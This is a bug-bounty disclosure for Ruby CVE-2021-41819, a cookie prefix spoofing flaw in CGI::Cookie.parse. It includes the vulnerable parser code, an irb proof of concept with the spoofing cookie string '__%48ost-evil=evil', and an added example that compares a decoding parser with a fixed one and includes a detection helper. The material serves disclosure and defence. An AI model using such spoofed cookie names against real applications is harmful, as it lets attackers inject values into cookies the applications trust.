hackerone ooooooo_q H1:1464396

Internet Bug Bounty: Ruby CVE-2021-41819: Cookie Prefix Spoofing in CGI::Cookie.parse

2022-01-30 07:31:32
ooooooo_q
hackerone.com
$2000
79

7.5 High (CVSS3)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: HIGH
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

5 Medium (CVSS2)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N

EPSS: 0.002 Low (Percentile: 56.8%)

Release note: https://www.ruby-lang.org/en/news/2021/11/24/cookie-prefix-spoofing-in-cgi-cookie-parse-cve-2021-41819/

> The old versions of CGI::Cookie.parse applied URL decoding to cookie names. An attacker could exploit this vulnerability to spoof security prefixes in cookie names, which may be able to trick a vulnerable application.

> By this fix, CGI::Cookie.parse no longer decodes cookie names. Note that this is an incompatibility if cookie names that you are using include non-alphanumeric characters that are URL-encoded.

> This is the same issue of CVE-2020-8184.


The following is copied from hackerone's report. https://hackerone.com/reports/910552

I found that the same problem as https://hackerone.com/reports/895727 exists in CGI::Cookie.parse.

https://github.com/ruby/ruby/blob/v2_7_1/lib/cgi/cookie.rb#L162

def self.parse(raw_cookie)
  cookies = Hash.new([])
  return cookies unless raw_cookie

  raw_cookie.split(/;\s?/).each do |pairs|
    name, values = pairs.split('=',2)
    next unless name and values
    name = CGI.unescape(name)
    values ||= ""
    values = values.split('&').collect{|v| CGI.unescape(v,@@accept_charset) }
    if cookies.has_key?(name)
      values = cookies[name].value + values
    end
    cookies[name] = Cookie.new(name, *values)
  end

  cookies
end

The value of name is decoded.

PoC

āÆ ruby -v
ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [x86_64-darwin19]

āÆ irb
irb(main):001:0> require 'cgi'
=> true

irb(main):002:0> cookie_a = CGI::Cookie.parse("__%48ost-evil=evil;__Host-evil=abc")
irb(main):003:0> cookie_a["__Host-evil"]
=> #<CGI::Cookie: "__Host-evil=evil&abc; path=">
irb(main):004:0> cookie_a["__Host-evil"].to_a
=> ["evil", "abc"]

irb(main):005:0> cookie_b = CGI::Cookie.parse("%48oge=evil;Hoge=abc;Foo=xxx")
irb(main):006:0> cookie_b["Hoge"].to_a
=> ["evil", "abc"]
irb(main):007:0> cookie_b["Foo"].to_a
=> ["xxx"]

Impact

It has the same impact as #895727, and it is possible to insert a value into the name of a cookie that should be protected by Cookie prefixes.
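The following is an added example, not code from the report or from Ruby itself. It reimplements the parse loop quoted above in two variants so the collision can be reproduced and the fix checked side by side: one variant URL-decodes the cookie name (the CVE-2021-41819 behaviour), the other keeps the name exactly as sent and decodes only values (the behaviour the release note describes for the fix). The module name CookieParse, the method names and the spoofed_prefix_names helper are all assumptions made for this example; the helper is a defender-side check that flags names which only acquire a __Host-/__Secure- prefix after decoding, which is the condition a log filter or edge proxy would want to alert on.

```ruby
require 'cgi'

# Added example (hypothetical module, not CGI::Cookie's own code).
module CookieParse
  SECURITY_PREFIXES = ['__Host-', '__Secure-'].freeze

  # Vulnerable variant: the name is URL-decoded, so "__%48ost-x" and
  # "__Host-x" land in the same hash slot and their values are merged.
  def self.parse_decoding_names(raw_cookie)
    parse(raw_cookie, decode_names: true)
  end

  # Fixed variant: the name stays as it appeared on the wire; only the
  # values are decoded. Encoded names therefore remain distinct keys.
  def self.parse_fixed(raw_cookie)
    parse(raw_cookie, decode_names: false)
  end

  # Shared loop, mirroring the structure of the quoted CGI::Cookie.parse.
  # Returns { name => [values...] }.
  def self.parse(raw_cookie, decode_names:)
    cookies = {}
    return cookies unless raw_cookie

    raw_cookie.split(/;\s?/).each do |pair|
      name, values = pair.split('=', 2)
      next unless name && values
      name = CGI.unescape(name) if decode_names
      decoded_values = values.split('&').map { |v| CGI.unescape(v) }
      (cookies[name] ||= []).concat(decoded_values)
    end
    cookies
  end

  # Defender-side check: raw names that are NOT literally prefixed but
  # WOULD be after URL decoding. Against a decoding parser these are the
  # spoofing attempts worth logging or rejecting before they reach the app.
  def self.spoofed_prefix_names(raw_cookie)
    return [] unless raw_cookie

    raw_cookie.split(/;\s?/).each_with_object([]) do |pair, flagged|
      name = pair.split('=', 2).first
      next if name.nil? || name.empty?
      literal = SECURITY_PREFIXES.any? { |p| name.start_with?(p) }
      gained  = SECURITY_PREFIXES.any? { |p| CGI.unescape(name).start_with?(p) }
      flagged << name if gained && !literal
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample header, the same shape as the report's PoC.
  header = '__%48ost-evil=evil;__Host-evil=abc;Foo=xxx'
  p CookieParse.parse_decoding_names(header)['__Host-evil'] # ["evil", "abc"]
  p CookieParse.parse_fixed(header)['__Host-evil']          # ["abc"]
  p CookieParse.spoofed_prefix_names(header)                # ["__%48ost-evil"]
end
```

The fixed variant carries the incompatibility the release note warns about: a legitimate cookie whose name contains URL-encoded non-alphanumerics is now returned under its encoded name, so an application relying on decoded names has to look them up as sent.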
